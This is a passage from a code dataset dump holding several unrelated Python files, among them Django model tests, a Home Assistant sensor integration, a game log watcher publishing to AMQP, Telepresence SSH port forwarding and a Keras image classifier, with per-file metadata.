ref_group = UserGroup.objects.get(pk=usergroup.id)\n self.assertTrue(ref_group.can_contribute)\n self.assertTrue(ref_group.can_moderate)\n\n def test_not_contribute_and_moderate(self):\n usergroup = UserGroupF.create()\n\n usergroup.can_contribute = False\n usergroup.can_moderate = True\n usergroup.save()\n\n ref_group = UserGroup.objects.get(pk=usergroup.id)\n self.assertTrue(ref_group.can_contribute)\n self.assertTrue(ref_group.can_moderate)\n\n def test_contribute_and_not_moderate(self):\n usergroup = UserGroupF.create()\n\n usergroup.can_contribute = True\n usergroup.can_moderate = False\n usergroup.save()\n\n ref_group = UserGroup.objects.get(pk=usergroup.id)\n self.assertTrue(ref_group.can_contribute)\n self.assertFalse(ref_group.can_moderate)\n\n def test_not_contribute_and_not_moderate(self):\n usergroup = UserGroupF.create()\n\n usergroup.can_contribute = False\n usergroup.can_moderate = False\n usergroup.save()\n\n ref_group = UserGroup.objects.get(pk=usergroup.id)\n self.assertFalse(ref_group.can_contribute)\n self.assertFalse(ref_group.can_moderate)\n", "sub_path": "geokey/users/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 2119, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 10, "usage_type": "name"}, {"api_name": "model_factories.UserF.create", "line_number": 12, "usage_type": "call"}, {"api_name": "model_factories.UserF", "line_number": 12, "usage_type": "name"}, {"api_name": "geokey.applications.tests.model_factories.ApplicationFactory.create", "line_number": 13, "usage_type": "call"}, {"api_name": "geokey.applications.tests.model_factories.ApplicationFactory", "line_number": 13, "usage_type": "name"}, {"api_name": "oauth2_provider.models.AccessToken.objects.create", "line_number": 14, "usage_type": "call"}, {"api_name": "oauth2_provider.models.AccessToken.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "oauth2_provider.models.AccessToken", "line_number": 14, "usage_type": "name"}, {"api_name": "oauth2_provider.models.AccessToken.objects.filter", "line_number": 24, "usage_type": "call"}, {"api_name": "oauth2_provider.models.AccessToken.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "oauth2_provider.models.AccessToken", "line_number": 24, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 27, "usage_type": "name"}, {"api_name": "model_factories.UserGroupF.create", "line_number": 29, "usage_type": "call"}, {"api_name": "model_factories.UserGroupF", "line_number": 29, "usage_type": "name"}, {"api_name": "models.UserGroup.objects.get", "line_number": 34, "usage_type": "call"}, {"api_name": "models.UserGroup.objects", "line_number": 34, "usage_type": "attribute"}, {"api_name": "models.UserGroup", "line_number": 34, "usage_type": "name"}, {"api_name": "model_factories.UserGroupF.create", "line_number": 39, "usage_type": "call"}, {"api_name": "model_factories.UserGroupF", "line_number": 39, "usage_type": "name"}, {"api_name": "models.UserGroup.objects.get", "line_number": 45, "usage_type": "call"}, {"api_name": "models.UserGroup.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.UserGroup", "line_number": 45, "usage_type": "name"}, {"api_name": "model_factories.UserGroupF.create", "line_number": 50, "usage_type": "call"}, {"api_name": "model_factories.UserGroupF", "line_number": 50, "usage_type": "name"}, {"api_name": "models.UserGroup.objects.get", "line_number": 56, "usage_type": "call"}, {"api_name": "models.UserGroup.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.UserGroup", "line_number": 56, "usage_type": "name"}, {"api_name": "model_factories.UserGroupF.create", "line_number": 61, "usage_type": "call"}, {"api_name": "model_factories.UserGroupF", "line_number": 61, "usage_type": "name"}, {"api_name": "models.UserGroup.objects.get", "line_number": 67, "usage_type": "call"}, {"api_name": "models.UserGroup.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "models.UserGroup", "line_number": 67, "usage_type": "name"}]} +{"seq_id": "480325595", "text": "\"\"\"Sensor support for Melnor Bluetooth water timer.\"\"\"\nfrom __future__ import annotations\n\nfrom collections.abc import Callable\nfrom dataclasses import dataclass\nfrom typing import Any\n\nfrom melnor_bluetooth.device import Device\n\nfrom homeassistant.components.sensor import (\n SensorDeviceClass,\n SensorEntity,\n SensorEntityDescription,\n SensorStateClass,\n)\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import PERCENTAGE, SIGNAL_STRENGTH_DECIBELS_MILLIWATT\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity import EntityCategory\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.typing import StateType\n\nfrom .const import DOMAIN\nfrom .models import MelnorBluetoothBaseEntity, MelnorDataUpdateCoordinator\n\n\n@dataclass\nclass MelnorSensorEntityDescriptionMixin:\n \"\"\"Mixin for required keys.\"\"\"\n\n state_fn: Callable[[Device], Any]\n\n\n@dataclass\nclass MelnorSensorEntityDescription(\n SensorEntityDescription, MelnorSensorEntityDescriptionMixin\n):\n \"\"\"Describes Melnor sensor entity.\"\"\"\n\n\nasync def async_setup_entry(\n hass: HomeAssistant,\n config_entry: ConfigEntry,\n async_add_devices: AddEntitiesCallback,\n) -> None:\n \"\"\"Set up the sensor platform.\"\"\"\n\n coordinator: MelnorDataUpdateCoordinator = hass.data[DOMAIN][config_entry.entry_id]\n\n sensors: list[MelnorSensorEntityDescription] = [\n MelnorSensorEntityDescription(\n device_class=SensorDeviceClass.BATTERY,\n entity_category=EntityCategory.DIAGNOSTIC,\n key=\"battery\",\n name=\"Battery\",\n native_unit_of_measurement=PERCENTAGE,\n state_class=SensorStateClass.MEASUREMENT,\n state_fn=lambda device: device.battery_level,\n ),\n MelnorSensorEntityDescription(\n device_class=SensorDeviceClass.SIGNAL_STRENGTH,\n entity_category=EntityCategory.DIAGNOSTIC,\n entity_registry_enabled_default=False,\n key=\"rssi\",\n name=\"RSSI\",\n native_unit_of_measurement=SIGNAL_STRENGTH_DECIBELS_MILLIWATT,\n state_class=SensorStateClass.MEASUREMENT,\n state_fn=lambda device: device.rssi,\n ),\n ]\n\n async_add_devices(\n MelnorSensorEntity(\n coordinator,\n description,\n )\n for description in sensors\n )\n\n\nclass MelnorSensorEntity(MelnorBluetoothBaseEntity, SensorEntity):\n \"\"\"Representation of a Melnor sensor.\"\"\"\n\n entity_description: MelnorSensorEntityDescription\n\n def __init__(\n self,\n coordinator: MelnorDataUpdateCoordinator,\n entity_description: MelnorSensorEntityDescription,\n ) -> None:\n \"\"\"Initialize a sensor for a Melnor device.\"\"\"\n super().__init__(coordinator)\n\n self._attr_unique_id = f\"{self._device.mac}-{entity_description.key}\"\n\n self.entity_description = entity_description\n\n @property\n def native_value(self) -> StateType:\n \"\"\"Return the battery level.\"\"\"\n return self.entity_description.state_fn(self._device)\n", "sub_path": "homeassistant/components/melnor/sensor.py", "file_name": "sensor.py", "file_ext": "py", "file_size_in_byte": 3124, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "collections.abc.Callable", "line_number": 31, "usage_type": "name"}, {"api_name": "melnor_bluetooth.device.Device", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 31, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 27, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorEntityDescription", "line_number": 36, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 34, "usage_type": "name"}, {"api_name": "homeassistant.core.HomeAssistant", "line_number": 42, "usage_type": "name"}, {"api_name": "homeassistant.config_entries.ConfigEntry", "line_number": 43, "usage_type": "name"}, {"api_name": "homeassistant.helpers.entity_platform.AddEntitiesCallback", "line_number": 44, "usage_type": "name"}, {"api_name": "models.MelnorDataUpdateCoordinator", "line_number": 48, "usage_type": "name"}, {"api_name": "const.DOMAIN", "line_number": 48, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorDeviceClass.BATTERY", "line_number": 52, "usage_type": "attribute"}, {"api_name": "homeassistant.components.sensor.SensorDeviceClass", "line_number": 52, "usage_type": "name"}, {"api_name": "homeassistant.helpers.entity.EntityCategory.DIAGNOSTIC", "line_number": 53, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.entity.EntityCategory", "line_number": 53, "usage_type": "name"}, {"api_name": "homeassistant.const.PERCENTAGE", "line_number": 56, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorStateClass.MEASUREMENT", "line_number": 57, "usage_type": "attribute"}, {"api_name": "homeassistant.components.sensor.SensorStateClass", "line_number": 57, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorDeviceClass.SIGNAL_STRENGTH", "line_number": 61, "usage_type": "attribute"}, {"api_name": "homeassistant.components.sensor.SensorDeviceClass", "line_number": 61, "usage_type": "name"}, {"api_name": "homeassistant.helpers.entity.EntityCategory.DIAGNOSTIC", "line_number": 62, "usage_type": "attribute"}, {"api_name": "homeassistant.helpers.entity.EntityCategory", "line_number": 62, "usage_type": "name"}, {"api_name": "homeassistant.const.SIGNAL_STRENGTH_DECIBELS_MILLIWATT", "line_number": 66, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorStateClass.MEASUREMENT", "line_number": 67, "usage_type": "attribute"}, {"api_name": "homeassistant.components.sensor.SensorStateClass", "line_number": 67, "usage_type": "name"}, {"api_name": "models.MelnorBluetoothBaseEntity", "line_number": 81, "usage_type": "name"}, {"api_name": "homeassistant.components.sensor.SensorEntity", "line_number": 81, "usage_type": "name"}, {"api_name": "models.MelnorDataUpdateCoordinator", "line_number": 88, "usage_type": "name"}, {"api_name": "homeassistant.helpers.typing.StateType", "line_number": 99, "usage_type": "name"}]} +{"seq_id": "451467815", "text": "import tarfile\nfrom itertools import chain\nimport pandas as pd\n\n\ndef csv_parser(filename):\n \"\"\"Extract CSV data from TAR.GZ file.\n\n Extracts all CSV files from a TAR.GZ archive and combines them into a list\n of dictionary objects.\n :param filename: Name of the filename to parse\n \"\"\"\n entries = list()\n with tarfile.open(filename) as tar:\n for member in tar:\n # Only CSV files are interesting\n if not member.name.endswith('.csv'):\n continue\n\n # Read the CSV\n csv_data = pd.read_csv(tar.extractfile(member))\n entries = chain(entries, csv_data.to_dict('records'))\n\n return list(entries)\n", "sub_path": "custom_parser/tar_gz_csv.py", "file_name": "tar_gz_csv.py", "file_ext": "py", "file_size_in_byte": 686, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tarfile.open", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 21, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "68140319", "text": "#!/usr/bin/env python\n\nimport os\nimport sys\nimport time\nimport re\nimport amqp\nimport pickle\nimport redis\nimport pprint\n\nfrom types import MappingProxyType\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\nfrom lib.il2_stats.constants import COALITION_ALIAS\nfrom lib.il2_stats.statuses import BotLifeStatus, SortieStatus, LifeStatus\nfrom lib.il2_stats.helpers import distance, point_in_polygon, is_pos_correct\nfrom lib.il2_stats.parse_mission_log_line import *\nfrom lib.il2_stats.report import *\n# from lib.il2_stats.models import (Object, Mission, Sortie, Profile, Player, PlayerAircraft, VLife,\n#\t\t\t\t\t\t PlayerMission, KillboardPvP, Tour, LogEntry, Score, Squad)\n# from lib.il2_stats.models import Object\nfrom util.config import *\n\nclass MissionReportParser:\n\tdef __init__(self):\n\t\tif checkConfig() == -1: return None \n\t\tself.config = openConfig()\n\n\t\tself.logsPath = self.config['gamePath'] + '\\\\data\\\\logs\\\\text'\n\t\tself.observer = Observer()\n\n\tdef run(self):\n\t\tevent_handler = MissionReportHandler(self.logsPath)\n\t\tself.observer.schedule(event_handler, self.logsPath, recursive=False)\n\t\tself.observer.start()\n\t\ttry:\n\t\t\twhile True:\n\t\t\t\ttime.sleep(1)\n\t\texcept KeyboardInterrupt:\n\t\t\tself.observer.stop()\n\t\tself.observer.join()\n\n\tdef stop(self):\n\t\tself.observer.stop()\n\t\tself.observer.join()\n\nclass MissionReportHandler(FileSystemEventHandler):\n\tdef __init__(self, logsPath):\n\t\tif checkConfig() == -1: return None \n\t\tself.config = openConfig()\n\n\t\tself.logsPath = logsPath\n\t\tself.connectAMQP()\n\t\tself.db = redis.Redis(host='localhost', port=6379, db=0)\n\t\tself.create_objects()\n\t\tself.mission = MissionReport(self.objects)\n\n\tdef create_objects(self):\n\t\tself.objects = {}\n\t\tscore_dict = {}\n\t\t# Parses the score file\n\t\twith open('lib\\\\il2_stats\\\\csv\\\\score.csv',encoding='utf-8') as file_csv:\n\t\t\tfor row in csv.DictReader(file_csv):\n\t\t\t\tscore_dict[row['key'].lower()] = {\n\t\t\t\t\t'type': row['type'], \n\t\t\t\t\t'value': row['value']\n\t\t\t\t}\n\t\t# Parses the object file\n\t\twith open('lib\\\\il2_stats\\\\csv\\\\objects.csv', encoding='utf-8') as file_csv:\n\t\t\tfor row in csv.DictReader(file_csv):\n\t\t\t\tname_en = row['name'] or row['log_name']\n\t\t\t\tis_playable = bool(int(row['playable']))\n\t\t\t\tself.objects[row['log_name'].lower()] = {\n\t\t\t\t\t'name': name_en, \n\t\t\t\t\t'name_en': name_en, \n\t\t\t\t\t'name_ru': row['name_ru'],\n\t\t\t\t\t'score_id': score_dict[row['cls']], \n\t\t\t\t\t'is_playable': is_playable,\n\t\t\t\t\t'cls': row['cls']\n\t\t\t\t}\n\t\t# Parses the class file\t\t\n\t\twith open('lib\\\\il2_stats\\\\csv\\\\classes.csv', encoding='utf-8') as file_csv:\n\t\t\tfor row in csv.DictReader(file_csv):\n\t\t\t\tfor key in self.objects:\n\t\t\t\t\tif (self.objects[key]['cls'] == row['cls']):\n\t\t\t\t\t\tself.objects[key]['cls_base'] = row['cls_base']\n\n\tdef connectAMQP(self):\n\t\tself.c = amqp.Connection('localhost', exchange='libds')\n\t\tself.c.connect()\n\t\tself.events = self.c.channel()\n\n\tdef on_created(self, event):\n\t\tif event.is_directory:\n\t\t\treturn None\n\t\telif event.event_type == 'created':\n\t\t\tpath = event.src_path\n\t\t\tif 'missionReport' in path and '.txt' in path:\n\t\t\t\t# print('Mission Report created: ' + path)\n\t\t\t\tself.parseNewMissionReport(path)\n\n\tdef cleanDirectory(self, currentFile):\n\t\tfor p in os.listdir(self.logsPath):\n\t\t\tfullPath = os.path.join(self.logsPath, p)\n\t\t\tif os.path.isfile(fullPath) and fullPath != currentFile:\n\t\t\t\tos.remove(fullPath)\n\t\t\t\t\n\n\tdef parseNewMissionReport(self, path):\n\t\ttry:\n\t\t\t# Wait for the game to release the file\n\t\t\ttime.sleep(0.1)\n\n\t\t\tself.processEvents(path)\n\t\t\tself.mission.processing(path)\n\t\t\t# Cleanup and save to Redis\n\t\t\tself.cleanDirectory(path)\n\t\t\tself.db.set('report', pickle.dumps(self.mission))\n\t\texcept Exception as e:\n\t\t\tprint('parseNewMissionReport error', file=sys.stderr)\n\t\t\tprint(str(e), file=sys.stderr)\n\n\tdef processEvents(self, file):\n\t\twith open(file, 'r') as f:\n\t\t\tfor line in f:\n\t\t\t\tif 'AType' not in line:\n\t\t\t\t\tprint('ignored bad string: [{}]'.format(line))\n\t\t\t\t\tcontinue\n\t\t\t\ttry:\n\t\t\t\t\tdata = parse(line)\n\t\t\t\texcept AttributeError:\n\t\t\t\t\tprint('bad line: [{}]'.format(line.strip()), file=sys.stderr)\n\t\t\t\t\tcontinue\n\t\t\t\texcept UnexpectedATypeWarning:\n\t\t\t\t\tprint('unexpected atype: [{}]'.format(line))\n\t\t\t\t\tcontinue\n\t\t\t\t# Publishes each event to AMQP server\n\t\t\t\t# pprint.pprint(data)\n\t\t\t\tmsg = amqp.Message(json.dumps(data, default=str), content_type='application/json')\n\t\t\t\tself.events.basic_publish(msg, exchange='libds', routing_key='events')\n\nif __name__ == '__main__':\n\tmrParser = MissionReportParser()\n\tmrParser.run()\n\n# ROADMAP\n'''\n[X] Delete all other log files whenever a log file is created\n[ ] Clean MLG files\n'''", "sub_path": "MissionReporter.py", "file_name": "MissionReporter.py", "file_ext": "py", "file_size_in_byte": 4555, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "watchdog.observers.Observer", "line_number": 32, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 40, "usage_type": "call"}, {"api_name": "watchdog.events.FileSystemEventHandler", "line_number": 49, "usage_type": "name"}, {"api_name": "redis.Redis", "line_number": 56, "usage_type": "call"}, {"api_name": "amqp.Connection", "line_number": 91, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 105, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 108, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 114, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 120, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 122, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 123, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 134, "usage_type": "attribute"}, {"api_name": "amqp.Message", "line_number": 141, "usage_type": "call"}]} +{"seq_id": "284204321", "text": "import os\nimport tempfile\nfrom pandas.testing import assert_frame_equal\n\nfrom tests.integration.fixtures import DaskTestCase\n\n\nclass CreateTestCase(DaskTestCase):\n def setUp(self):\n super().setUp()\n\n self.f = os.path.join(tempfile.gettempdir(), os.urandom(24).hex())\n\n def tearDown(self):\n super().tearDown()\n\n if os.path.exists(self.f):\n os.unlink(self.f)\n\n def test_create_from_csv(self):\n self.df.to_csv(self.f, index=False)\n\n self.c.sql(\n f\"\"\"\n CREATE TABLE\n new_table\n WITH (\n location = '{self.f}',\n format = 'csv'\n )\n \"\"\"\n )\n\n df = self.c.sql(\n \"\"\"\n SELECT * FROM new_table\n \"\"\"\n ).compute()\n\n assert_frame_equal(self.df, df)\n\n def test_create_from_csv_persist(self):\n self.df.to_csv(self.f, index=False)\n\n self.c.sql(\n f\"\"\"\n CREATE TABLE\n new_table\n WITH (\n location = '{self.f}',\n format = 'csv',\n persist = True\n )\n \"\"\"\n )\n\n df = self.c.sql(\n \"\"\"\n SELECT * FROM new_table\n \"\"\"\n ).compute()\n\n assert_frame_equal(self.df, df)\n\n def test_wrong_create(self):\n self.assertRaises(\n AttributeError,\n self.c.sql,\n f\"\"\"\n CREATE TABLE\n new_table\n WITH (\n format = 'csv'\n )\n \"\"\",\n )\n\n self.assertRaises(\n AttributeError,\n self.c.sql,\n f\"\"\"\n CREATE TABLE\n new_table\n WITH (\n format = 'strange',\n location = 'some/path'\n )\n \"\"\",\n )\n", "sub_path": "tests/integration/test_create.py", "file_name": "test_create.py", "file_ext": "py", "file_size_in_byte": 1933, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tests.integration.fixtures.DaskTestCase", "line_number": 8, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "tempfile.gettempdir", "line_number": 12, "usage_type": "call"}, {"api_name": "os.urandom", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.testing.assert_frame_equal", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.testing.assert_frame_equal", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "276457071", "text": "import tensorflow as tf\nimport numpy as np\nimport argparse\nimport json\nimport base64\n\nmodel_dir = \"F:\\\\output\"\ninput_file = \"F:\\\\309.png\"\noutput_file = \"F:\\\\310.png\"\n\ndef main():\n\twith open(input_file, \"rb\") as f:\n\t\tinput_data = f.read()\n\n\tinput_instance = dict(input=base64.urlsafe_b64encode(input_data).decode(\"ascii\"), key=\"0\")\n\tinput_instance = json.loads(json.dumps(input_instance))\n\tprint(input_instance)\n\n\twith tf.Session() as sess:\n\t\tsaver = tf.train.import_meta_graph(model_dir + \"/export.meta\")\n\t\tsaver.restore(sess, model_dir + \"/export\")\n\t\tinput_vars = json.loads(tf.get_collection(\"inputs\")[0].decode())\n\t\toutput_vars = json.loads(tf.get_collection(\"outputs\")[0].decode())\n\t\tinput = tf.get_default_graph().get_tensor_by_name(input_vars[\"input\"])\n\t\toutput = tf.get_default_graph().get_tensor_by_name(output_vars[\"output\"])\n\n\t\tinput_value = np.array(input_instance[\"input\"])\n\t\toutput_value = sess.run(output, feed_dict={input: np.expand_dims(input_value, axis=0)})[0]\n\n\toutput_instance = dict(output=output_value.decode(\"ascii\"), key=\"0\")\n\n\tb64data = output_instance[\"output\"]\n\tb64data += \"=\" * (-len(b64data) % 4)\n\toutput_data = base64.urlsafe_b64decode(b64data.encode(\"ascii\"))\n\n\twith open(output_file, \"wb\") as f:\n\t\tf.write(output_data)\n\nmain()", "sub_path": "process_image_test.py", "file_name": "process_image_test.py", "file_ext": "py", "file_size_in_byte": 1258, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "base64.urlsafe_b64encode", "line_number": 15, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.train.import_meta_graph", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 20, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.get_collection", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.get_collection", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 28, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64decode", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "33108175", "text": "# Copyright 2018 Datawire. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom typing import List, Tuple\n\nfrom telepresence.runner import Runner\n\nfrom .ssh import SSH\n\n\ndef expose_local_services(\n runner: Runner,\n ssh: SSH,\n exp_port_numbers: List[Tuple[int, int]],\n to_pod: List[int],\n from_pod: List[int],\n show_only: bool = False,\n) -> None:\n \"\"\"Create SSH tunnels from remote proxy pod to local host.\n\n The show_only param is used to show messages for the container method; the\n tunnels are created in the network container, where those messages are not\n visible to the user.\n \"\"\"\n if not exp_port_numbers and runner.chatty:\n runner.show(\n \"\\nNo traffic is being forwarded from the remote Deployment to \"\n \"your local machine. You can use the --expose option to specify \"\n \"which ports you want to forward.\"\n )\n forward_arguments = [] # type: List[str]\n for local_port, remote_port in exp_port_numbers:\n if runner.chatty:\n runner.show(\n \"Forwarding remote port {} to local port {}.\".format(\n remote_port,\n local_port,\n )\n )\n forward_arguments.extend([\n \"-R\",\n \"*:{}:127.0.0.1:{}\".format(remote_port, local_port),\n ])\n for port in to_pod:\n if runner.chatty:\n runner.show(\"Forwarding localhost:{} to the pod\".format(port))\n forward_arguments.extend([\n \"-L\",\n \"127.0.0.1:{}:127.0.0.1:{}\".format(port, port),\n ])\n for port in from_pod:\n if runner.chatty:\n runner.show(\"Forwarding localhost:{} from the pod\".format(port))\n forward_arguments.extend([\n \"-R\",\n \"127.0.0.1:{}:127.0.0.1:{}\".format(port, port),\n ])\n if forward_arguments and not show_only:\n runner.launch(\n \"SSH port forward (exposed ports)\",\n ssh.bg_command(forward_arguments)\n )\n if runner.chatty:\n runner.show(\"\\n\")\n", "sub_path": "telepresence/connect/expose.py", "file_name": "expose.py", "file_ext": "py", "file_size_in_byte": 2586, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "telepresence.runner.Runner", "line_number": 23, "usage_type": "name"}, {"api_name": "ssh.SSH", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "ssh.bg_command", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "644818164", "text": "import numpy as np\nfrom keras.preprocessing import image\nimport csv\nfrom keras.utils import to_categorical\nfrom sklearn.model_selection import train_test_split\nimport cnn as CNN\n# import matplotlib.pyplot as plt\nfrom keras.models import load_model\nimport sklearn.metrics as metrics\nfrom sklearn.metrics import classification_report\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn import tree\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import confusion_matrix\n\n\ndef get_images():\n\n picDat = np.ndarray(shape=(5000, 256, 256,1))\n\n for i in range(1, 5001):\n img1 = image.load_img('dataset/faceDat/' + str(int(i)) + '.png' , target_size=((256, 256)), color_mode = \"grayscale\")\n x = image.img_to_array(img1)\n x = np.expand_dims(x, axis=0)\n picDat[i - 1] = x\n pd = picDat.reshape(picDat.shape[0], picDat.shape[1] * picDat.shape[2] * picDat.shape[3])\n return pd\n\n\ndef get_labels():\n labels_file = open('./dataset/attribute_list.csv')\n file_csv = csv.reader(labels_file)\n i = -2\n hair = np.ndarray(shape=(5000,))\n\n for row in file_csv:\n if (i > -1):\n hair[i] = int(row[1]) + 1\n i = i + 1\n return hair\n\n\ndef get_data(xLabels,yLabels):\n p = 0.75\n part = int(len(yLabels) * p)\n\n tr_X = xLabels[:part]\n\n tr_Y = yLabels[:part]\n\n te_X = xLabels[part:]\n\n te_Y = yLabels[part:]\n\n tr_X = tr_X.astype('float32')\n te_X = te_X.astype('float32')\n tr_X = tr_X / 255.\n te_X = te_X / 255.\n\n # Change the labels from categorical to one-hot encoding\n train_Y_one_hot = to_categorical(tr_Y)\n test_Y_one_hot = to_categorical(te_Y)\n #print(train_Y_one_hot, tr_Y)\n train_X, valid_X, train_label, valid_label = train_test_split(tr_X, train_Y_one_hot, test_size=0.2,random_state=13)\n\n return train_X, train_label, te_X, test_Y_one_hot, valid_X, valid_label\n\n\ndef inspect(train_X, train_Y, test_X, test_Y, vX, vY):\n print('Training data shape : ', train_X.shape, train_Y.shape)\n\n print('Testing data shape : ', test_X.shape, test_Y.shape)\n\n print('Validation data shape : ', vX.shape, vY.shape)\n\n classes = np.unique(train_Y)\n\n nClasses = len(classes)\n\n print('Total number of outputs : ', nClasses)\n\n print('Output classes : ', classes)\n\n\ndef contruct_cnn(n, xTrain, yTrain, xTest, yTest, valid_X, valid_label): #check data\n batch_size = 200\n epochs = 18\n num_classes = n\n\n classifier = CNN.build(num_classes)\n\n tdr = classifier.fit(xTrain, yTrain, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(valid_X, valid_label))\n classifier.save(\"cnnmodel1.h5py\")\n loss, acc = classifier.evaluate(xTest, yTest, verbose=0)\n # print(acc * 100)\n plot_cnn(tdr)\n return acc, loss\n\n\ndef plot_cnn(fashion_train_dropout):\n accuracy = fashion_train_dropout.history['acc']\n val_accuracy = fashion_train_dropout.history['val_acc']\n loss = fashion_train_dropout.history['loss']\n val_loss = fashion_train_dropout.history['val_loss']\n epochs = range(len(accuracy))\n plt.plot(epochs, accuracy, 'bo', label='Training accuracy')\n plt.plot(epochs, val_accuracy, 'b', label='Validation accuracy')\n plt.title('Training and validation accuracy')\n plt.legend()\n plt.figure()\n plt.plot(epochs, loss, 'bo', label='Training loss')\n plt.plot(epochs, val_loss, 'b', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n plt.show()\n\n\ndef get_statistacs(modelname, xTrain, yTrain, xTest, yTest, valid_X, valid_label,num_classes, ):\n model = load_model(modelname)\n loss, acc = model.evaluate(xTest, yTest, verbose=0)\n print(acc, loss)\n y_pred_one = model.predict(xTest)\n predicted_classes = np.argmax(np.round(y_pred_one), axis=1)\n\n\n confusion_matrix = metrics.confusion_matrix(y_true=np.argmax(np.round(yTest), axis=1), y_pred=predicted_classes)\n\n\n target_names = [\"Class {}\".format(i) for i in range(num_classes)]\n print(classification_report(np.argmax(np.round(yTest), axis=1), predicted_classes, target_names = target_names))\n\n return confusion_matrix\n\n\n#######################################\n\n\n#######################################\n\n\n#######################################\n\n\ndef train_decision_tree(training_images, training_labels, test_images, test_labels):\n\n clf = tree.DecisionTreeClassifier()\n\n clf.fit(training_images, training_labels)\n\n ans = clf.score(test_images, test_labels)\n predicted_classes = np.argmax(np.round(clf.predict(test_images)), axis=1)\n cm = metrics.confusion_matrix(y_true=np.argmax(np.round(test_labels), axis=1), y_pred=predicted_classes)\n # cm = 